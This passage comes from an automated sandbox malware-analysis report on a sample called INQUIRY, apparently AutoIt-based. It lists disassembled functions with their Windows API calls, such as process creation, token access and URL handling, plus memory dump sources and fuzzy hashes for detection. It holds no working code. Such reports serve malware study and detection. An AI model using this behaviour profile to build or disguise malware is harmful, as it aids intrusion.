                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                              • String ID:
                                                                                              • API String ID: 2875609808-0
                                                                                              • Opcode ID: 1038104229a6ad3fac601e44fa1b9c5d7a56994d874369971f7f5ff6bf7cb67f
                                                                                              • Instruction ID: c920866b1c7babfecd57a3b7263f8077b97fa7a6d14bb054cf280b39c925db42
                                                                                              • Opcode Fuzzy Hash: 1038104229a6ad3fac601e44fa1b9c5d7a56994d874369971f7f5ff6bf7cb67f
                                                                                              • Instruction Fuzzy Hash: 92111C32D00519DBCF00DFE9DD48AEEBBB8FB09711F51825AEA49B6240CA7055918BD5
                                                                                              Function 00A6D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00A6D84D
                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00A6D864
                                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00A6D879
                                                                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00A6D897
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                                                              • String ID:
                                                                                              • API String ID: 1352324309-0
                                                                                              • Opcode ID: 183cadddc79de5284920a06f08bd3dfd5828c7e62a5ad24ec6f0a4b8b82867aa
                                                                                              • Instruction ID: d30a22b29d2970882e87cd3a8a87ffd70de2596c4e4b50e2a2f9236c1799a209
                                                                                              • Opcode Fuzzy Hash: 183cadddc79de5284920a06f08bd3dfd5828c7e62a5ad24ec6f0a4b8b82867aa
                                                                                              • Instruction Fuzzy Hash: 49115EB5B05304DFE720CF90DC0CF92BBBCEB40B40F10856AAA16D7050DBB0E9599BA1
                                                                                              Function 00A46FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction ID: 3c5ecf4ce3a055e302b107d5bf6cb937f64eef9e47c3b0c53305af91b033fa83
                                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction Fuzzy Hash: 0B014C7A44918ABBCF265F88DC01CEE3F62BB98350F598415FE5858031D736DAB1AB81
                                                                                              Function 00A9B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A9B2E4
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A9B2FC
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A9B320
                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A9B33B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 357397906-0
                                                                                              • Opcode ID: 4f202cbe2adff0d613b36e3d71b4738c8efdab20aa31378525c335a33b883062
                                                                                              • Instruction ID: e63307b5ddefd7eb8f0fa59509e566479a723fedbcd7356b6bb7fb9a97fb88fe
                                                                                              • Opcode Fuzzy Hash: 4f202cbe2adff0d613b36e3d71b4738c8efdab20aa31378525c335a33b883062
                                                                                              • Instruction Fuzzy Hash: 27114679D00249EFDB41CF99D5449EEBBF5FB08310F104166E914E3620D735AA558F50
                                                                                              Function 00A9B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A9B644
                                                                                              • _memset.LIBCMT ref: 00A9B653
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00AD6F20,00AD6F64), ref: 00A9B682
                                                                                              • CloseHandle.KERNEL32 ref: 00A9B694
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3277943733-0
                                                                                              • Opcode ID: de3ff4dcad962bef013c463b68f7dea9b8bcb0ba0a91393c78c31f74b01611d5
                                                                                              • Instruction ID: 712d15f652f8c6a388d9f2b358ad3be7a365a1943a7ef7814172e8af8eb8d0cc
                                                                                              • Opcode Fuzzy Hash: de3ff4dcad962bef013c463b68f7dea9b8bcb0ba0a91393c78c31f74b01611d5
                                                                                              • Instruction Fuzzy Hash: 5EF05EB26417047EF710A7A1BC46FBB3B9CEB0C395F004022FA0AE9192D7755C0187A8
                                                                                              Function 00A76BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00A76BE6
                                                                                                • Part of subcall function 00A776C4: _memset.LIBCMT ref: 00A776F9
                                                                                              • _memmove.LIBCMT ref: 00A76C09
                                                                                              • _memset.LIBCMT ref: 00A76C16
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00A76C26
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 48991266-0
                                                                                              • Opcode ID: cca4c45dd4d97fee9145f4ba99adede288c84049f0489322180322817d4bc985
                                                                                              • Instruction ID: ab1ba635ee21fc53b29326993eae46d42e739f845c4b7252b898dfedab94fa32
                                                                                              • Opcode Fuzzy Hash: cca4c45dd4d97fee9145f4ba99adede288c84049f0489322180322817d4bc985
                                                                                              • Instruction Fuzzy Hash: E8F0543A200100AFCF016F95DC85E8ABB29EF45361F14C061FE089E227DB31E811CBB4
                                                                                              Function 00A12218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000008), ref: 00A12231
                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 00A1223B
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00A12250
                                                                                              • GetStockObject.GDI32(00000005), ref: 00A12258
                                                                                              • GetWindowDC.USER32(?,00000000), ref: 00A4BE83
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A4BE90
                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00A4BEA9
                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 00A4BEC2
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00A4BEE2
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00A4BEED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1946975507-0
                                                                                              • Opcode ID: d11ba6d5571c74d5b79ae894d5dbfb17103a8b537d01fba7453822f259cbf1df
                                                                                              • Instruction ID: 6a17b440e7b18fc85e37c74d986986cebb965480a085d6ef3858e570aff819bb
                                                                                              • Opcode Fuzzy Hash: d11ba6d5571c74d5b79ae894d5dbfb17103a8b537d01fba7453822f259cbf1df
                                                                                              • Instruction Fuzzy Hash: 74E03031204144AEDF219FA4EC4D7D83B10EB45332F208367FB69880E18B718991DB61
                                                                                              Function 00A68712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThread.KERNEL32 ref: 00A6871B
                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00A682E6), ref: 00A68722
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A682E6), ref: 00A6872F
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00A682E6), ref: 00A68736
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                                              • String ID:
                                                                                              • API String ID: 3974789173-0
                                                                                              • Opcode ID: 11fe4cae7817cd1b17bdc9f15faadac4068bd0e78e047a332330915861be9278
                                                                                              • Instruction ID: 9d3eff2e45c91031c5c483d67b606d9eb7bf8d011dcd7445f2c5abee7e3b9329
                                                                                              • Opcode Fuzzy Hash: 11fe4cae7817cd1b17bdc9f15faadac4068bd0e78e047a332330915861be9278
                                                                                              • Instruction Fuzzy Hash: C3E086367112119FDB209FF05D0DB973BBCEF54B91F144829B645C9080EE788452C750
                                                                                              Function 00A6B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00A6B4BE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContainedObject
                                                                                              • String ID: AutoIt3GUI$Container
                                                                                              • API String ID: 3565006973-3941886329
                                                                                              • Opcode ID: 19cf37a0006007be3f3d2697754f5e6c920003619b12bfcf3f9a81d549665ba3
                                                                                              • Instruction ID: 5a7fc71865a0fe77d2172568975fca75651344698a4694723728d321e4936971
                                                                                              • Opcode Fuzzy Hash: 19cf37a0006007be3f3d2697754f5e6c920003619b12bfcf3f9a81d549665ba3
                                                                                              • Instruction Fuzzy Hash: 02913970610601AFDB14DF68C884BAAB7F5FF49710F20856DF946CB6A1DB71E881CB60
                                                                                              Function 00A7AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A2FC86: _wcscpy.LIBCMT ref: 00A2FCA9
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              • __wcsnicmp.LIBCMT ref: 00A7B02D
                                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00A7B0F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                              • String ID: LPT
                                                                                              • API String ID: 3222508074-1350329615
                                                                                              • Opcode ID: fbde71f4742b6ba5aa9d014431ec09a32d5d0f0544f3091011328834e07f7229
                                                                                              • Instruction ID: 25ae10a7b04d7d05029db256f85780602760ad989e426dad446839f590e54594
                                                                                              • Opcode Fuzzy Hash: fbde71f4742b6ba5aa9d014431ec09a32d5d0f0544f3091011328834e07f7229
                                                                                              • Instruction Fuzzy Hash: F76173B5A10215AFCB14DF54C961FEEB7B4EF08310F10C169F91AAB251D730AE41CB64
                                                                                              Function 00A22957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 00A22968
                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A22981
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                              • String ID: @
                                                                                              • API String ID: 2783356886-2766056989
                                                                                              • Opcode ID: 67a5ba400ad317c65eca411f51ae1300c9eebee5faca0f49f8262d19e78ee213
                                                                                              • Instruction ID: 102be2e899b41b6e990b1f75ab102fe310ef9e13a23f25673439e7a0c8314b7b
                                                                                              • Opcode Fuzzy Hash: 67a5ba400ad317c65eca411f51ae1300c9eebee5faca0f49f8262d19e78ee213
                                                                                              • Instruction Fuzzy Hash: DC514772408744ABD720EF50D986BEFBBE8FB85344F41885DF2D8410A2DB308569CB66
                                                                                              Function 00A79734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A14F0B: __fread_nolock.LIBCMT ref: 00A14F29
                                                                                              • _wcscmp.LIBCMT ref: 00A79824
                                                                                              • _wcscmp.LIBCMT ref: 00A79837
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscmp$__fread_nolock
                                                                                              • String ID: FILE
                                                                                              • API String ID: 4029003684-3121273764
                                                                                              • Opcode ID: f9f4952b643d01ce182532d8060ccda44e84141b5e34063fd763b278152d6708
                                                                                              • Instruction ID: ce4f1181b73423e760062854d692b4a4491d0393ab315ba299cbb74856e7fc82
                                                                                              • Opcode Fuzzy Hash: f9f4952b643d01ce182532d8060ccda44e84141b5e34063fd763b278152d6708
                                                                                              • Instruction Fuzzy Hash: 0441C875A40219BADF209FA4CC46FEFBBBDEF89710F00846AF904F7181DA7199458B61
                                                                                              Function 00A8258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A8259E
                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A825D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CrackInternet_memset
                                                                                              • String ID: |
                                                                                              • API String ID: 1413715105-2343686810
                                                                                              • Opcode ID: 5a5f092ad7d139133c9b863f1407cd70cc13f3daff9c4dfb8e195ecb8a9da59b
                                                                                              • Instruction ID: 02f47e95c572e4c6fcd5e8fe444a641f720bef979560201136eb7017d0a2577e
                                                                                              • Opcode Fuzzy Hash: 5a5f092ad7d139133c9b863f1407cd70cc13f3daff9c4dfb8e195ecb8a9da59b
                                                                                              • Instruction Fuzzy Hash: BB31F771800119EBCF11EFA4CD85EEEBFB9FF08350F101069F915A6262EB355996DB60
                                                                                              Function 00A97A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00A97B61
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A97B76
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: '
                                                                                              • API String ID: 3850602802-1997036262
                                                                                              • Opcode ID: 8190e7f471579d164e79ec9bc55887d1d3f742e41da2bd0a9e99b6c7780facc8
                                                                                              • Instruction ID: 379ee2f74d3d2c12b039ac40aa1aad51ace98ab38cf97c9a0db176adde15ef71
                                                                                              • Opcode Fuzzy Hash: 8190e7f471579d164e79ec9bc55887d1d3f742e41da2bd0a9e99b6c7780facc8
                                                                                              • Instruction Fuzzy Hash: AC41E374A0520A9FDF14CF68C981BEEBBF5FB08340F10016AE905AB391E770A951CFA0
                                                                                              Function 00A96A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00A96B17
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A96B53
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$DestroyMove
                                                                                              • String ID: static
                                                                                              • API String ID: 2139405536-2160076837
                                                                                              • Opcode ID: 7d1f7a0b21cd5477148949f5a61b8c82d9b2631e4db6938c23af9c75dada1cf1
                                                                                              • Instruction ID: 93edc9d6023befa340e88c584232c06a37c212b3e888d5301dc4f0cfc9bfa130
                                                                                              • Opcode Fuzzy Hash: 7d1f7a0b21cd5477148949f5a61b8c82d9b2631e4db6938c23af9c75dada1cf1
                                                                                              • Instruction Fuzzy Hash: E7313871210604AEDF109F68D891AFB77F9FF48760F10861AF9A9D7190DA31AC92DB60
                                                                                              Function 00A728A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A72911
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A7294C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoItemMenu_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 2223754486-4108050209
                                                                                              • Opcode ID: c719d528499600400eb02c7fd6d38a753ffc4a5c3e32b94410d35fe361e2a8a8
